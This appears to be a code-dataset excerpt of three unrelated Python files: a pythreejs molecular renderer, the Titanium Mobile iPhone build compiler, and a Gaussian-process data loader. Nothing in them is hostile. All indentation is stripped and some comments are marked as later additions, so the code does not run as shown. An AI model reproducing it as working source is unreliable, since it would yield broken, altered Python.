return self.bond_geometry
self.bond_geometry = CylinderGeometry(radiusTop=self.bond_radius,
radiusBottom=self.bond_radius,
height=1,
radialSegments=12,
heightSegments=6,
openEnded=False)
return self.bond_geometry
def __get_bond_material(self, color, shininess=75):
"""
This function returns a Material object used to draw bonds
Parameters
----------
color : str
Hexadecimal color code
shininess : int
The shininess of the material (default = 75)
"""
if color in self.bond_materials:
return self.bond_materials[color]
material = MeshStandardMaterial(color=color,
roughness=0.25,
metalness=0.1)
self.bond_materials[color] = material
return material
def __get_cylinder_mesh(self, xyz1, xyz2, radius1, radius2, color):
"""
This function returns a Mesh object (Geometry + Material) that represents a bond between
atoms 1 and 2
Parameters
----------
xyz1 : tuple(float, float, float)
The (x1, y1, z1) coordinates of atom 1
xyz2 : tuple(float, float, float)
The (x2, y2, z2) coordinates of atom 2
radius1 : float
The radius of the bond at atom 1
radius2 : float
The radius of the bond at atom 2
color : str
Hexadecimal color code
"""
radius1 = max(0.01, radius1)
radius2 = max(0.01, radius2)
x1, y1, z1 = xyz1
x2, y2, z2 = xyz2
d = sqrt((x1 - x2)**2 + (y1 - y2)**2 + (z1 - z2)**2)
position = [(x2 + x1) / 2, (y2 + y1) / 2, (z2 + z1) / 2]
geometry = CylinderGeometry(radiusTop=radius2,
radiusBottom=radius1,
height=d,
radialSegments=12,
heightSegments=6,
openEnded=False)
material = MeshPhongMaterial(color=color, shininess=100)
mesh = Mesh(geometry=geometry, material=material, position=position)
# If the bond rotation is 180 deg then return
if y1 - y2 == d:
mesh.rotateX(3.14159265359)
return mesh
R = self.__cylinder_rotation_matrix(xyz1, xyz2)
mesh.setRotationFromMatrix(R)
return mesh
def __get_arrow_mesh(self,
xyz1,
xyz2,
color,
radius_small=0.1,
radius_large=0.3,
arrow_height=0.6):
"""
This function returns a mesh for an arrow between two points
Parameters
----------
xyz1 : tuple(float, float, float)
The (x1, y1, z1) coordinates of the beginning of the arrow
xyz2 : tuple(float, float, float)
The (x2, y2, z2) coordinates of the end of the arrow
color : str
Hexadecimal color code
radius_small : float
The radius of the arrow tail
radius_large : float
The radius of the base of the arrow cone
arrow_height : float
The height of the arrow cone
"""
x1, y1, z1 = xyz1
x2, y2, z2 = xyz2
d = sqrt((x1 - x2)**2 + (y1 - y2)**2 + (z1 - z2)**2)
fraction = (d - arrow_height) / d
xyz_base = [
x1 + (x2 - x1) * fraction, y1 + (y2 - y1) * fraction,
z1 + (z2 - z1) * fraction
]
mesh = []
mesh.append(self.__get_cylinder_mesh(xyz1, xyz_base, radius_small,
radius_small, color))
mesh.append(self.__get_cylinder_mesh(xyz_base, xyz2, radius_large, 0.0,
color))
return mesh
def __plane_rotation_matrix(self, normal):
"""
Computes the rotation matrix that converts a plane (circle/square) geometry in
its standard orientation to one in which the plane is orthogonal to a given
vector (normal). By default, planes in pythreejs are orthogonal to the vector (0,0,1),
that is, they lay on the xy plane
Parameters
----------
normal : tuple(float, float, float)
The vector to which we want to make a plane orthogonal
"""
# normalize the vector
x, y, z = normal
d = sqrt(x**2 + y**2 + z**2)
x /= d
y /= d
z /= d
# compute the cross product: normal x (0,0,1)
c0 = y
c1 = -x
c2 = 0.0
# compute the dot product: normal . (0,0,1)
dot = z
c = dot
s = sqrt(1 - c**2)
# rotation matrix, see https://en.wikipedia.org/wiki/Rotation_matrix#Rotation_matrix_from_axis_and_angle
R = [
c + (1 - c) * c0**2, c0 * c1 * (1 - c), c1 * s, c0 * c1 * (1 - c),
c + (1 - c) * c1**2, -c0 * s, -c1 * s, c0 * s, c
]
return R
def bond_cutoff(self, r1, r2):
"""
Compute the cutoff value for displaying a bond between two atoms
Parameters
----------
r1 : float
The radius of atom 1
r2 : float
The radius of atom 2
"""
return 1.5 * self.angtobohr * (r1 + r2)
def __cylinder_rotation_matrix(self, xyz1, xyz2):
"""
Computes the rotation matrix that converts a cylinder geometry in its standard
orientation to a cylinder that starts at point xyz1 and ends at xyz2
Parameters
----------
xyz1 : tuple(float, float, float)
The (x1, y1, z1) coordinates of the beginning of the cylinder
xyz2 : tuple(float, float, float)
The (x2, y2, z2) coordinates of the end of the cylinder
"""
x1, y1, z1 = xyz1
x2, y2, z2 = xyz2
d = sqrt((x1 - x2)**2 + (y1 - y2)**2 + (z1 - z2)**2)
b1 = (x2 - x1) / d
b2 = (y2 - y1) / d
b3 = (z2 - z1) / d
gamma = 1 / (1 + b2)
R = [
1 - b1 * b1 * gamma, -b1, -b1 * b3 * gamma, b1,
1 - (b1 * b1 + b3 * b3) * gamma, b3, -b1 * b3 * gamma, -b3,
1 - b3 * b3 * gamma
]
return R
def __isosurface_mesh(self, data, level, color, extent=None, opacity=1.0):
"""
This function returns a Mesh object (Geometry + Material) for an isosurface
Parameters
----------
data : numpy.ndarray
A 3D array containing the values on a grid
level : float
The isosurface level. This must be included in the range of values on the grid
color : str
Hexadecimal code for the color used to display the surface
extent : list
list of [[xmin, xmax], [ymin, ymax], [zmin, zmax]] values that define the bounding box of the mesh,
otherwise the viewport is used
opacity : float
The opacity of the surface (default = 1.0)
"""
vertices, faces = self.__compute_isosurface(data,
level=level,
color=color,
extent=extent)
# Create the geometry
isoSurfaceGeometry = Geometry(vertices=vertices, faces=faces)
# Calculate normals per vertex for round edges
isoSurfaceGeometry.exec_three_obj_method('computeVertexNormals')
if opacity == 1.0:
material = MeshStandardMaterial(vertexColors='VertexColors',
roughness=0.3,
metalness=0.0,
side='DoubleSide',
transparent=False)
else:
material = MeshStandardMaterial(vertexColors='VertexColors',
roughness=0.3,
metalness=0.0,
side='DoubleSide',
transparent=True,
opacity=opacity)
# Create a mesh
isoSurfaceMesh = Mesh(geometry=isoSurfaceGeometry, material=material)
return isoSurfaceMesh
def __compute_isosurface(self, data, level, color, extent=None):
"""
Compute the vertices and faces of an isosurface from grid data
Parameters
----------
data : numpy.ndarray
Grid data stored as a numpy 3D tensor
level : float
The isocontour value that defines the surface
color :
color of a face
extent : list
list of [[xmin, xmax], [ymin, ymax], [zmin, zmax]] values that define the bounding box of the mesh,
otherwise the viewport is used
Returns
-------
a tuple of vertices and faces
"""
values = skimage.measure.marching_cubes_lewiner(data, level * 0.995)
sk_verts, sk_faces, normals, values = values
x, y, z = sk_verts.T
# Rescale coordinates to given limits
if extent:
xlim, ylim, zlim = extent
x = x * np.diff(xlim) / (data.shape[0]) + xlim[0]
y = y * np.diff(ylim) / (data.shape[1]) + ylim[0]
z = z * np.diff(zlim) / (data.shape[2]) + zlim[0]
# Assemble the list of vertices
vertices = []
for n in range(len(x)):
vertices.append([x[n], y[n], z[n]])
# Assemble the list of faces
faces = []
for face in sk_faces:
i, j, k = face
faces.append((i, j, k, None, (color, color, color), None))
return (vertices, faces)
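# Illustrative note (added for clarity, not in the original file): with
# data.shape == (40, 40, 40) and extent == [[-5, 5], [-5, 5], [-5, 5]],
# a marching-cubes vertex at grid index 20 along x is mapped to
#     20 * (5 - (-5)) / 40 + (-5) = 0.0
# so the reconstructed surface spans the requested bounding box.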
def __molecule_extents(self, atoms_list):
"""
Compute the extent of a molecule
Parameters
----------
atoms_list : list(tuple(str, float, float, float))
A list of tuples containing the atomic symbol and coordinates of the atom using the format
(atomic symbol,x,y,z)
Returns
-------
A tuple(float, float, float, float, float, float) containing the minimum and maximum
coordinates of this molecule in the format (minx, maxx, miny, maxy, minz, maxz)
"""
minx = min(map(lambda x: x[1], atoms_list))
maxx = max(map(lambda x: x[1], atoms_list))
miny = min(map(lambda x: x[2], atoms_list))
maxy = max(map(lambda x: x[2], atoms_list))
minz = min(map(lambda x: x[3], atoms_list))
maxz = max(map(lambda x: x[3], atoms_list))
return (minx, maxx, miny, maxy, minz, maxz)
def __center_of_mass(self, atoms_list):
"""
This function returns the center of mass of a molecule
Parameters
----------
atoms_list : list(tuple(str, float, float, float))
A list of tuples containing the atomic symbol and coordinates of the atom using the format
(atomic symbol,x,y,z)
"""
X = 0.0
Y = 0.0
Z = 0.0
M = 0.0
for (symbol, x, y, z) in atoms_list:
mass = ATOM_DATA[ATOM_SYMBOL_TO_Z[symbol]]['mass']
X += mass * x
Y += mass * y
Z += mass * z
M += mass
return (X / M, Y / M, Z / M)
|
evangelistalab/forte
|
forte/utils/py3js_renderer.py
|
Python
|
lgpl-3.0
| 43,790
|
[
"Psi4"
] |
d5300c837bdc733c562ba3879910a7eced279801645dfd582fd087f724dce436
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Project Compiler
#
import os, sys, re, shutil, time, base64, run, sgmllib, codecs
template_dir = os.path.abspath(os.path.dirname(sys._getframe(0).f_code.co_filename))
sys.path.append(os.path.join(template_dir,'../'))
sys.path.append(os.path.join(template_dir,'../module'))
from tiapp import *
import jspacker
from csspacker import CSSPacker
from module import ModuleDetector
ignoreFiles = ['.gitignore', '.cvsignore', '.DS_Store'];
ignoreDirs = ['.git','.svn','_svn','CVS','android','iphone'];
HEADER = """/**
* Appcelerator Titanium Mobile
* This is generated code. Do not modify. Your changes *will* be lost.
* Generated code is Copyright (c) 2009-2011 by Appcelerator, Inc.
* All Rights Reserved.
*/
#import <Foundation/Foundation.h>
"""
INTERFACE_HEADER= """
@interface ApplicationRouting : NSObject {
}
+ (NSData*) resolveAppAsset:(NSString*)path;
"""
IMPL_HEADER= """#import "ApplicationRouting.h"
extern NSData * decode64 (NSData * thedata);
extern NSData * dataWithHexString (NSString * hexString);
extern NSData * decodeDataWithKey (NSData * thedata, NSString * key);
@implementation ApplicationRouting
"""
FOOTER ="""
@end
"""
MODULE_IMPL_HEADER = """#import "ApplicationMods.h"
@implementation ApplicationMods
+ (NSArray*) compiledMods
{
NSMutableArray *modules = [NSMutableArray array];
"""
class HTMLParser(sgmllib.SGMLParser):
def parse(self, s):
self.feed(s)
self.close()
def __init__(self, verbose=0):
sgmllib.SGMLParser.__init__(self, verbose)
self.scripts = []
def start_script(self, attributes):
for name, value in attributes:
if name == "src":
self.scripts.append(value)
def get_scripts(self):
return self.scripts
def read_module_properties(dir):
file = os.path.join(dir,'manifest')
dict = {}
if os.path.exists(file):
contents = open(file).read()
for line in contents.splitlines(True):
if line[0:1]=='#': continue
idx = line.find(':')
if idx==-1: continue
k=line[0:idx]
v=line[idx+1:].strip()
dict[k]=v
return dict
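# Hedged example (hypothetical manifest contents, not from the repo): a manifest file
#
#   # comments are skipped
#   name: ti.foo
#   version: 1.0
#
# would make read_module_properties(dir) return {'name': 'ti.foo', 'version': '1.0'}.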
# Need to pre-parse xcconfig files to mangle variable names, and then
# dump them into a map so that we can re-assemble them later
def parse_xcconfig(xcconfig, moduleId, variables):
module_xcconfig = open(xcconfig)
new_xcconfig = ''
local_variables = {}
prefix = moduleId.upper().replace('.','_')
for line in module_xcconfig:
# Strip comments
comment = line.find('//')
if comment != -1:
line = line[0:comment]
# Generate new varname / value pairings
# The regular expression parses a valid line into components
# <var>=<value>
# <var>[<key>=<keyvalue>]=<value>
# e.g.
# OTHER_LDFLAGS=-framework EventKit
# OTHER_LDFLAGS[sdk=iphoneos4*]=-liconv
splitline = re.split('(([^\[=]+)(\[[^\]]+\])?) *=? *(.+)', line)
if len(splitline) >= 5:
varname = splitline[1]
value = splitline[4]
name = prefix + '_' + varname.strip()
name = re.sub(r'[^\w]', '_', name)
local_variables[varname] = name
new_xcconfig += name + '=' + value + '\n'
module_xcconfig.close()
# Update any local variable references with new varname
# and add variables to the global variables map
for (varname, name) in local_variables.iteritems():
source = '$(%s)' % varname
target = '$(%s)' % name
new_xcconfig = new_xcconfig.replace(source,target)
# Add new varname to the list
if not varname in variables:
variables[varname] = [name]
else:
variables[varname].append(name)
new_xcconfig += '\n'
return new_xcconfig
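# Hedged example of the mangling above (module id and values are made up): for
# moduleId 'ti.foo', the xcconfig line
#   OTHER_LDFLAGS=-framework EventKit
# becomes
#   TI_FOO_OTHER_LDFLAGS=-framework EventKit
# and any '$(OTHER_LDFLAGS)' reference in the same file is rewritten to
# '$(TI_FOO_OTHER_LDFLAGS)'; the caller later emits
#   OTHER_LDFLAGS=$(inherited) $(TI_FOO_OTHER_LDFLAGS)
# so that flags contributed by several modules can be merged.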
#
# TODO/FIXME
#
# - encryptor
#
class Compiler(object):
def __init__(self,project_dir,appid,name,deploytype,xcode,devicefamily,iphone_version,silent=False):
self.project_dir = project_dir
self.project_name = name
self.appid = appid
self.iphone_dir = os.path.join(project_dir,'build','iphone')
self.classes_dir = os.path.join(self.iphone_dir,'Classes')
self.modules = []
self.modules_metadata = []
# for now, these are required
self.defines = ['USE_TI_ANALYTICS','USE_TI_NETWORK','USE_TI_PLATFORM','USE_TI_UI', 'USE_TI_API']
tiapp_xml = os.path.join(project_dir,'tiapp.xml')
ti = TiAppXML(tiapp_xml)
sdk_version = os.path.basename(os.path.abspath(os.path.join(template_dir,'../')))
detector = ModuleDetector(project_dir)
missing_modules, modules = detector.find_app_modules(ti, 'iphone')
if xcode:
app_name = os.environ['FULL_PRODUCT_NAME']
app_dir = os.path.join(os.environ['TARGET_BUILD_DIR'],os.environ['CONTENTS_FOLDER_PATH'])
else:
target = 'Debug'
if deploytype == 'production':
target = 'Release'
app_name = name+'.app'
app_folder_name = '%s-iphoneos' % target
app_dir = os.path.abspath(os.path.join(self.iphone_dir,'build',app_folder_name,app_name))
main_template_file = os.path.join(template_dir,'main.m')
main_template = codecs.open(main_template_file, encoding='utf-8').read()
main_template = main_template.replace('__PROJECT_NAME__',name)
main_template = main_template.replace('__PROJECT_ID__',appid)
main_template = main_template.replace('__DEPLOYTYPE__',deploytype)
main_template = main_template.replace('__APP_ID__',appid)
main_template = main_template.replace('__APP_ANALYTICS__',ti.properties['analytics'])
main_template = main_template.replace('__APP_PUBLISHER__',ti.properties['publisher'])
main_template = main_template.replace('__APP_URL__',ti.properties['url'])
main_template = main_template.replace('__APP_NAME__',ti.properties['name'])
main_template = main_template.replace('__APP_VERSION__',ti.properties['version'])
main_template = main_template.replace('__APP_DESCRIPTION__',ti.properties['description'])
main_template = main_template.replace('__APP_COPYRIGHT__',ti.properties['copyright'])
main_template = main_template.replace('__APP_GUID__',ti.properties['guid'])
main_template = main_template.replace('__APP_RESOURCE_DIR__','')
if not silent:
print "[INFO] Titanium SDK version: %s" % sdk_version
print "[INFO] iPhone Device family: %s" % devicefamily
print "[INFO] iPhone SDK version: %s" % iphone_version
main_template_out = os.path.join(self.iphone_dir,'main.m')
# read the current main.m (if any) first, so the file is only rewritten when the
# generated contents actually change
main_file_contents = None
if os.path.exists(main_template_out):
	main_file_contents = codecs.open(main_template_out,'r',encoding='utf-8').read()
if main_file_contents!=main_template:
	main_file = codecs.open(main_template_out,'w',encoding='utf-8')
	main_file.write(main_template)
	main_file.close()
if deploytype != 'production':
version = ti.properties['version']
# we want to make sure in debug mode the version always changes
version = "%s.%d" % (version,time.time())
ti.properties['version']=version
resources_dir = os.path.join(project_dir,'Resources')
iphone_resources_dir = os.path.join(resources_dir,'iphone')
# copy in any resources in our module like icons
project_module_dir = os.path.join(project_dir,'modules','iphone')
if os.path.exists(project_module_dir):
self.copy_resources([project_module_dir],app_dir,False)
# we have to copy these even in simulator given the path difference
if os.path.exists(app_dir):
self.copy_resources([iphone_resources_dir],app_dir,False)
# generate the includes for all compiled modules
xcconfig_c = "// this is a generated file - DO NOT EDIT\n\n"
has_modules = False
if len(modules) > 0:
mods = open(os.path.join(self.classes_dir,'ApplicationMods.m'),'w+')
variables = {}
mods.write(MODULE_IMPL_HEADER)
for module in modules:
module_id = module.manifest.moduleid.lower()
module_name = module.manifest.name.lower()
module_version = module.manifest.version
module_guid = ''
module_licensekey = ''
if module.manifest.has_property('guid'):
module_guid = module.manifest.guid
if module.manifest.has_property('licensekey'):
module_licensekey = module.manifest.licensekey
self.modules_metadata.append({'guid':module_guid,'name':module_name,'id':module_id,'dir':module.path,'version':module_version,'licensekey':module_licensekey})
xcfile = module.get_resource('module.xcconfig')
if os.path.exists(xcfile):
xcconfig_contents = parse_xcconfig(xcfile, module_id, variables)
xcconfig_c += xcconfig_contents
xcfile = os.path.join(self.project_dir,'modules','iphone',"%s.xcconfig" % module_name)
if os.path.exists(xcfile):
xcconfig_contents = parse_xcconfig(xcfile, module_id, variables)
xcconfig_c += xcconfig_contents
mods.write(" [modules addObject:[NSDictionary dictionaryWithObjectsAndKeys:@\"%s\",@\"name\",@\"%s\",@\"moduleid\",@\"%s\",@\"version\",@\"%s\",@\"guid\",@\"%s\",@\"licensekey\",nil]];\n" % (module_name,module_id,module_version,module_guid,module_licensekey));
mods.write(" return modules;\n")
mods.write("}\n")
mods.write(FOOTER)
mods.close()
for (name, values) in variables.iteritems():
xcconfig_c += name + '=$(inherited) '
for value in values:
xcconfig_c += '$(%s) ' % value
xcconfig_c += '\n'
has_modules = True
xcconfig = os.path.join(self.iphone_dir,"module.xcconfig")
make_xcc = True
if os.path.exists(xcconfig):
existing_xcc = open(xcconfig).read()
# only copy if different so we don't trigger re-compile in xcode
make_xcc = existing_xcc!=xcconfig_c
if make_xcc:
xcconfig = open(xcconfig,'w')
xcconfig.write(xcconfig_c)
xcconfig.close()
if deploytype=='simulator':
shutil.copy(os.path.join(template_dir,'Classes','defines.h'),os.path.join(self.classes_dir,'defines.h'))
if deploytype!='development' or has_modules:
if os.path.exists(app_dir) and deploytype != 'development':
self.copy_resources([resources_dir],app_dir)
if deploytype == 'production':
debugger_plist = os.path.join(app_dir,'debugger.plist')
if os.path.exists(debugger_plist):
os.remove(debugger_plist)
if deploytype!='development':
defines_file = os.path.join(self.classes_dir,'defines.h')
defines_content = "// Warning: this is a generated file. Do not modify!\n\n"
defines_content+= "#define TI_VERSION %s\n"%sdk_version
for sym in self.defines:
	defines_content+="#define %s 1\n"%sym
# compare against the existing defines.h before opening it for writing, so an
# unchanged file is not rewritten (which would trigger a needless Xcode rebuild)
existing_defines = None
if os.path.exists(defines_file):
	existing_defines = open(defines_file).read()
if defines_content!=existing_defines:
	defines_header = open(defines_file,'w')
	defines_header.write(defines_content)
	defines_header.close()
# deploy any module image files
for module in self.modules:
img_dir = os.path.join(template_dir,'modules',module.lower(),'images')
print "[DEBUG] module image = %s" % img_dir
if not os.path.exists(img_dir): continue
dest_img_dir = os.path.join(app_dir,'modules',module.lower(),'images')
if not os.path.exists(dest_img_dir):
os.makedirs(dest_img_dir)
self.copy_resources([img_dir],dest_img_dir,False)
if deploytype!='development' and os.path.exists(app_dir):
# optimize PNGs - since we don't include them in the Resources of the xcodeproj
# the ones we copy in won't get optimized so we need to run it manually
# we can skip this on the simulator but should do it on device
dev_path = "/Developer"
# we need to ask xcode where the root path is
path = run.run(["/usr/bin/xcode-select","-print-path"],True,False)
if path:
dev_path = path.strip()
run.run(["%s/Platforms/iPhoneOS.platform/Developer/usr/bin/iphoneos-optimize"%dev_path,app_dir],False)
# remove empty directories
os.chdir(app_dir)
os.system("find . -type d -empty -delete")
else:
print "[INFO] Skipping JS compile, running from simulator"
if deploytype=='development':
self.softlink_resources(resources_dir,app_dir)
self.softlink_resources(iphone_resources_dir,app_dir)
def add_symbol(self,api):
print "[DEBUG] detected symbol: %s" % api
curtoken = ''
tokens = api.split(".")
try:
self.modules.index(tokens[0])
except:
self.modules.append(tokens[0])
for token in tokens:
curtoken+=token+"."
symbol = 'USE_TI_%s' % (curtoken.replace('.create','').replace('.','').replace('-','_').upper())
try:
self.defines.index(symbol)
except:
self.defines.append(symbol)
def extract_tokens(self,sym,line):
# sloppy joe parsing coooode
# could be prettier and faster but it works and is rather reliable
c = 0
tokens = []
search = sym + "."
size = len(search)
while True:
i = line.find(search,c)
if i < 0:
break
found = False
buf = ''
x = 0
for n in line[i+size:]:
# look for a terminal - this could probably be easier
if n in ['(',')','{','}','=',',',' ',':','!','[',']','+','*','/','~','^','%','\n','\t','\r']:
found = True
break
buf+=n
x+=1
tokens.append(buf)
if found:
c = i + x + 1
continue
break
return tokens
def compile_js(self,file_contents):
for line in file_contents.split(';'):
for symbol in ('Titanium','Ti'):
for sym in self.extract_tokens(symbol,line):
self.add_symbol(sym)
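# Hedged illustration of the symbol detection above (example line made up): for
# the JS statement
#   Ti.UI.createWindow({})
# extract_tokens('Ti', ...) yields ['UI.createWindow'], and add_symbol() then
# registers the defines USE_TI_UI and USE_TI_UIWINDOW ('.create' is stripped)
# and records 'UI' as a used module.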
def process_html_files(self,data,source_root):
compile = []
if data.has_key('.js'):
for entry in data['.html']:
html_file = entry['from']
file_contents = open(os.path.expanduser(html_file)).read()
parser = HTMLParser()
parser.parse(file_contents)
# extract all our scripts that are dependencies and we
# don't compile these
scripts = parser.get_scripts()
if len(scripts) > 0:
js_files = data['.js']
for script in scripts:
# if a remote script, ignore
if script.startswith('http:') or script.startswith('https:'):
continue
if script.startswith('app://'):
script = script[6:]
# build a file relative to the html file
fullpath = os.path.abspath(os.path.join(os.path.dirname(html_file),script))
# remove this script from being compiled
for f in js_files:
if f['from']==fullpath:
# target it to be compiled
compile.append(f)
js_files.remove(f)
break
return compile
@classmethod
def make_function_from_file(cls,path,file,instance=None):
file_contents = open(os.path.expanduser(file)).read()
file_contents = jspacker.jsmin(file_contents)
file_contents = file_contents.replace('Titanium.','Ti.')
if instance: instance.compile_js(file_contents)
data = str(file_contents).encode("hex")
method = "dataWithHexString(@\"%s\")" % data
return {'method':method,'path':path}
def softlink_resources(self,source,target):
if not os.path.exists(target):
os.makedirs(target)
for file in os.listdir(source):
if (file in ignoreDirs) or (file in ignoreFiles):
continue
from_ = os.path.join(source, file)
to_ = os.path.join(target, file)
print "[DEBUG] linking: %s to %s" % (from_,to_)
if os.path.exists(to_):
if os.path.islink(to_):
os.remove(to_)
os.symlink(from_, to_)
else:
os.symlink(from_, to_)
def copy_resources(self,sources,target,write_routing=True):
if write_routing:
intf = open(os.path.join(self.classes_dir,'ApplicationRouting.h'),'w+')
impf = open(os.path.join(self.classes_dir,'ApplicationRouting.m'),'w+')
intf.write(HEADER)
intf.write(INTERFACE_HEADER)
impf.write(HEADER)
impf.write(IMPL_HEADER)
impf.write("+ (NSData*) resolveAppAsset:(NSString*)path;\n{\n")
impf.write(" static NSMutableDictionary *map;\n")
impf.write(" if (map==nil)\n")
impf.write(" {\n")
impf.write(" map = [[NSMutableDictionary alloc] init];\n")
impf_buffer = ''
if not os.path.exists(os.path.expanduser(target)):
os.makedirs(os.path.expanduser(target))
def add_compiled_resources(source,target):
print "[DEBUG] copy resources from %s to %s" % (source,target)
compiled_targets = {}
for root, dirs, files in os.walk(source):
for name in dirs: # don't walk through .bundle directories to avoid detecting media files within them and copying the same resources in 3 places instead of one
if name.find(".bundle")>0:
dirs.remove(name)
for name in ignoreDirs:
if name in dirs:
dirs.remove(name) # don't visit ignored directories
for file in files:
if file[-7:] == '.coffee': # don't copy .coffee script files
coffee_file = os.path.join(root, file)
ignoreFiles.append(file)
if file in ignoreFiles:
continue
prefix = root[len(source):]
from_ = os.path.join(root, file)
to_ = os.path.expanduser(from_.replace(source, target, 1))
to_directory = os.path.expanduser(os.path.split(to_)[0])
if not os.path.exists(to_directory):
os.makedirs(to_directory)
fp = os.path.splitext(file)
ext = fp[1]
if ext == '.jss': continue
if len(fp)>1 and write_routing and ext in ['.html','.js','.css']:
path = prefix + os.sep + file
path = path[1:]
entry = {'path':path,'from':from_,'to':to_}
if compiled_targets.has_key(ext):
compiled_targets[ext].append(entry)
else:
compiled_targets[ext]=[entry]
else:
# only copy if different filesize or doesn't exist
if not os.path.exists(to_) or os.path.getsize(from_)!=os.path.getsize(to_):
print "[DEBUG] copying: %s to %s" % (from_,to_)
shutil.copyfile(from_, to_)
if compiled_targets.has_key('.html'):
compiled = self.process_html_files(compiled_targets,source)
if len(compiled) > 0:
for c in compiled:
from_ = c['from']
to_ = c['to']
path = c['path']
print "[DEBUG] copying: %s to %s" % (from_,to_)
file_contents = open(from_).read()
file_contents = jspacker.jsmin(file_contents)
file_contents = file_contents.replace('Titanium.','Ti.')
to = open(to_,'w')
to.write(file_contents)
to.close()
for ext in ('.css','.html'):
if compiled_targets.has_key(ext):
for css_file in compiled_targets[ext]:
from_ = css_file['from']
to_ = css_file['to']
print "[DEBUG] copying: %s to %s" % (from_,to_)
if ext == '.css':
file_contents = open(from_).read()
packer = CSSPacker(file_contents)
file_contents = packer.pack()
to = open(to_,'w')
to.write(file_contents)
to.close()
else:
shutil.copyfile(from_, to_)
if compiled_targets.has_key('.js'):
for js_file in compiled_targets['.js']:
path = js_file['path']
from_ = js_file['from']
to_ = js_file['to']
print "[DEBUG] compiling: %s" % from_
metadata = Compiler.make_function_from_file(path,from_,self)
method = metadata['method']
eq = path.replace('.','_')
impf.write(' [map setObject:%s forKey:@"%s"];\n' % (method,eq))
# copy in any module assets
for metadata in self.modules_metadata:
tp_dir = os.path.join(metadata['dir'],'assets')
if not os.path.exists(tp_dir): continue
tp_id = metadata['id']
t = '%s/modules/%s' %(target,tp_id)
add_compiled_resources(tp_dir,t)
for source in sources:
add_compiled_resources(source,target)
if write_routing:
impf.write(" }\n")
impf.write(" return [map objectForKey:path];\n")
impf.write('}\n')
impf.write(impf_buffer)
intf.write(FOOTER)
impf.write(FOOTER)
intf.close()
impf.close()
if __name__ == "__main__":
project_dir = os.path.expanduser("~/tmp/yoyoyo")
appid = "com.appcelerator.yoyoyo"
name = "Yo Yo Yo"
deploytype = 'development'
xcode = False
# devicefamily and iphone_version are required arguments; the values below are placeholders
c = Compiler(project_dir,appid,name,deploytype,xcode,'universal','4.0')
|
arnaudsj/titanium_mobile
|
support/iphone/compiler.py
|
Python
|
apache-2.0
| 19,432
|
[
"VisIt"
] |
04c85ca508d36cebcf74ed88d8c5263a7e1fa24f651e220d3741e856669fa4a9
|
__author__ = 'AT'
import gzip
import os
import cPickle
import pandas
from ExtRBF import ExtRBF
import GPy
import numpy as np
class DataSource:
"""
Loading and preparing data for experiments. Some of the datasets are generated using the Matlab code
(see data/matlab_code_data), in order to ensure that the training and test points
are the same as those used in the previous paper (Nguyen and Bonilla, NIPS 2014).
The Matlab code to generate data is ``load_data.m``
"""
def __init__(self):
pass
@staticmethod
def normal_generate_samples(n_samples, var, input_dim=3):
num_samples = n_samples
num_in = input_dim
X = np.random.uniform(low=-1.0, high=1.0, size=(num_samples, num_in))
X.sort(axis=0)
rbf = ExtRBF(num_in, variance=0.5,
lengthscale=np.array(np.random.uniform(low=0.1, high=3.0, size=input_dim)), ARD=True)
white = GPy.kern.White(num_in, variance=var[0,0])
kernel = rbf + white
K = kernel.K(X)
y = np.empty((num_samples, var.shape[0]))
for j in range(var.shape[0]):
y[:, j] = np.reshape(np.random.multivariate_normal(np.zeros(num_samples), K), (num_samples))
return X, y, rbf
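# Hedged usage sketch (values are illustrative, not from the repo):
#   var = np.array([[0.01], [0.02]])          # one noise variance per output
#   X, Y, rbf = DataSource.normal_generate_samples(100, var, input_dim=3)
#   # X.shape == (100, 3), Y.shape == (100, 2); rbf is the ExtRBF kernel used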
@staticmethod
def wisconsin_breast_cancer_data():
"""
Loads and returns data of Wisconsin breast cancer dataset. Note that ``X`` is standardized.
Returns
-------
data : list
a list of length = 5, where each element is a dictionary which contains
``train_Y``, ``train_X``, ``test_Y``, ``test_X``, and ``id``
Notes
-----
Data is directly imported from the Matlab code for AVIGP paper.
References
----------
* Mangasarian OL, Street WN, Wolberg WH. Breast cancer diagnosis and prognosis via linear programming.
Oper Res. 1995;43(4);570-7
"""
# uncomment these lines to read directly from original file
# data_test = pandas.read_csv('../data/breast-cancer-wisconsin.csv', header=None)
# # replacing Y values with -1 and 1
# data_test.loc[data_test[10] == 2, 10] = -1
# data_test.loc[data_test[10] == 4, 10] = 1
# data_test = data_test.convert_objects(convert_numeric=True).dropna()
# X = data_test.ix[:, 1:9]
# Y = data_test.ix[:, 10]
# return np.array(X), Y[:, np.newaxis]
data = []
for i in range(1, 6):
train = pandas.read_csv('data/wisconsin_cancer/train_' + str(i) + '.csv', header=None)
test = pandas.read_csv('data/wisconsin_cancer/test_' + str(i) + '.csv', header=None)
data.append({
'train_Y': train.ix[:, 0].values[:, np.newaxis],
'train_X': train.ix[:, 1:].values,
'test_Y': test.ix[:, 0].values[:, np.newaxis],
'test_X': test.ix[:, 1:].values,
'id': i
})
return data
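# Hedged usage sketch (not part of the original file; assumes the data/ CSVs are
# present): every loader below returns the same structure, so a 5-fold experiment
# can be driven like
#   for fold in DataSource.wisconsin_breast_cancer_data():
#       X_train, Y_train = fold['train_X'], fold['train_Y']
#       X_test, Y_test = fold['test_X'], fold['test_Y']
#       print 'fold', fold['id'], X_train.shape, Y_test.shape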
@staticmethod
def USPS_data():
"""
Loads and returns data of USPS dataset. Note that ``X`` is standardized. Only digits 4,7, and 9 are included.
Returns
-------
data : list
a list of length = 5, where each element is a dictionary which contains
``train_Y``, ``train_X``, ``test_Y``, ``test_X``, and ``id``
References
----------
* Rasmussen CE, Williams CKI. {G}aussian processes for machine learning. The MIT Press; 2006.
Data is imported from the Matlab code.
"""
data = []
for i in range(1, 6):
train = pandas.read_csv('data/USPS/train_' + str(i) + '.csv', header=None)
test = pandas.read_csv('data/USPS/test_' + str(i) + '.csv', header=None)
# data.append({
# 'train_Y': label_to_num(train.ix[:, 0:2].values),
# 'train_X': train.ix[:, 3:].values,
# 'test_Y': label_to_num(test.ix[:, 0:2].values),
# 'test_X': test.ix[:, 3:].values,
# 'id': i
# })
data.append({
'train_Y': train.ix[:, 0:2].values,
'train_X': train.ix[:, 3:].values,
'test_Y': test.ix[:, 0:2].values,
'test_X': test.ix[:, 3:].values,
'id': i
})
return data
@staticmethod
def mining_data():
"""
Loads and returns data of Coal-mining disasters dataset. See 'get_mine_data.m' to see how data is generated.
Returns
-------
data : list
a list of length = 1, where each element is a dictionary which contains
``train_Y``, ``train_X``, ``test_Y``, ``test_X``, and ``id``. Training and test points are the same.
References
----------
